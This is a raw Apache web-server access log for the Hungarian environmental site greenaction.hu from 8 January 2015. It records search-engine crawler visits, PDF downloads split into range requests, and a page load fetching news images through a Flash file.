90.16.201.50 - - [08/Jan/2015:07:42:53 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
157.55.39.41 - - [08/Jan/2015:07:53:51 +0100] "GET /aktualis_elemei/szulinap2.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.35 - - [08/Jan/2015:08:14:19 +0100] "GET /aktualis_elemei/katonai_elemei/image003.jpg HTTP/1.1" 200 88392 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.78.81 - - [08/Jan/2015:08:35:31 +0100] "GET /kiadvany/miskolchvte.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.183.35.98 - - [08/Jan/2015:08:55:02 +0100] "GET /aktualis_elemei/katonai_elemei/image004.jpg HTTP/1.1" 200 56554 "https://www.google.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
66.249.78.81 - - [08/Jan/2015:09:29:36 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.96.58.83 - - [08/Jan/2015:10:33:41 +0100] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0"
123.125.71.56 - - [08/Jan/2015:11:15:47 +0100] "GET /kiadvany/delbukk.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
77.111.90.197 - - [08/Jan/2015:11:22:09 +0100] "GET /archiv_elemei/acitc.html HTTP/1.1" 200 13312 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.10 (intrepid) Firefox/3.0.4"
192.210.195.35 - - [08/Jan/2015:11:33:16 +0100] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1"
192.210.195.35 - - [08/Jan/2015:11:33:16 +0100] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1"
192.210.195.35 - - [08/Jan/2015:11:33:17 +0100] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1"
66.249.78.67 - - [08/Jan/2015:12:16:18 +0100] "GET /aktualis_elemei/katonai.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.67 - - [08/Jan/2015:12:16:41 +0100] "GET /zoldakcio.swf HTTP/1.1" 200 840351 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
109.98.90.201 - - [08/Jan/2015:12:30:41 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 200 116806 "https://www.google.ro/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:41 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 32768 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:42 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 562718 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:42 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 32768 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:42 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 32768 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:42 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 32768 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:43 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 32768 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:43 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 32768 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:43 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 32768 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:43 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 32768 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:43 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 32768 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:43 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 32768 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:43 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 65536 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:43 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 65536 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:43 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 65536 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:43 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 65536 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:43 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 65536 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:43 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 65536 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:43 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 65536 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:44 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 65536 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:44 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 65536 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:44 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 65536 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:44 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 131072 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:44 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 131072 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:44 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 131072 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:44 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 131072 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:44 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 131072 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:44 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 131072 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:45 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 131072 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:45 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 131072 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:45 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 131072 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:45 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 131072 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:45 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 262144 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:45 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 262144 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:46 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 262144 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:46 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 262144 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:46 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 262144 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:46 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 262144 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:46 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 262144 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:47 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 262144 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:47 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 262144 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:47 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 262144 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:47 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 524288 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:47 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 524288 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:48 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 524288 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:48 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 524288 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:49 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 524288 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:49 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 524288 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:49 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 524288 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:49 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 524288 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:50 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 524288 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:50 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 1095276 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:30:51 +0100] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
109.98.90.201 - - [08/Jan/2015:12:31:03 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 206 886 "http://www.greenaction.hu/kiadvany/miabio.pdf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36"
66.249.78.74 - - [08/Jan/2015:12:41:35 +0100] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.67 - - [08/Jan/2015:12:41:35 +0100] "GET /aktualis_elemei/bio2szulinap.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
180.76.5.76 - - [08/Jan/2015:12:47:28 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
212.96.58.83 - - [08/Jan/2015:12:57:25 +0100] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0"
212.96.58.83 - - [08/Jan/2015:12:57:25 +0100] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0"
66.249.78.108 - - [08/Jan/2015:13:36:44 +0100] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.101 - - [08/Jan/2015:13:36:44 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
50.23.131.206 - - [08/Jan/2015:14:09:34 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.9"
50.23.131.206 - - [08/Jan/2015:14:09:34 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.9"
50.23.131.206 - - [08/Jan/2015:14:09:41 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.9"
50.23.131.206 - - [08/Jan/2015:14:09:42 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.9"
188.165.15.119 - - [08/Jan/2015:14:10:20 +0100] "GET /magunkrol_elemei/kozhasznu.html HTTP/1.1" 200 48365 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
208.115.111.72 - - [08/Jan/2015:14:13:13 +0100] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
66.249.78.81 - - [08/Jan/2015:14:14:42 +0100] "GET /kiadvany/miabio.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.182.253.233 - - [08/Jan/2015:14:23:53 +0100] "GET /kiadvany/miskolchvte.pdf HTTP/1.1" 206 32768 "http://www.greenaction.hu/kiadvany/miskolchvte.pdf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
81.182.253.233 - - [08/Jan/2015:14:23:53 +0100] "GET /kiadvany/miskolchvte.pdf HTTP/1.1" 200 34171 "https://www.google.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
81.182.253.233 - - [08/Jan/2015:14:23:58 +0100] "GET /kiadvany/miskolchvte.pdf HTTP/1.1" 206 4026481 "http://www.greenaction.hu/kiadvany/miskolchvte.pdf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
81.182.253.233 - - [08/Jan/2015:14:23:59 +0100] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
208.115.111.72 - - [08/Jan/2015:14:44:49 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
188.6.163.113 - - [08/Jan/2015:14:58:27 +0100] "GET / HTTP/1.1" 200 884 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:28 +0100] "GET /pattern.jpg HTTP/1.1" 200 13798 "http://greenaction.hu/" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:28 +0100] "GET /zoldakcio.swf HTTP/1.1" 200 840351 "http://greenaction.hu/" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:28 +0100] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:28 +0100] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:28 +0100] "GET /banner/norway.jpg HTTP/1.1" 200 3191 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:28 +0100] "GET /esemenynaptar/SparkEventsCalendar_loadVars.txt HTTP/1.1" 200 72712 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/hirek.txt HTTP/1.1" 200 96857 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/helyivedett.jpg HTTP/1.1" 404 1181 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/biomassza2.jpg HTTP/1.1" 404 1181 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/biomassza_forum.jpg HTTP/1.1" 200 6616 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/kocsonyabeka.jpg HTTP/1.1" 200 4334 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/gmokrumpli.jpg HTTP/1.1" 200 9110 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/nullahullakovesd%20011.jpg HTTP/1.1" 200 8674 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/programindito.jpg HTTP/1.1" 200 6594 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/beno.jpg HTTP/1.1" 200 2623 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/foldnapja.jpg HTTP/1.1" 200 4081 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/foldnap2010.jpg HTTP/1.1" 200 7191 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/gmofree.gif HTTP/1.1" 404 1181 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/gmoevo.jpg HTTP/1.1" 200 2951 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
188.6.163.113 - - [08/Jan/2015:14:58:29 +0100] "GET /hirek/torta.jpg HTTP/1.1" 404 1181 "http://greenaction.hu/zoldakcio.swf" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
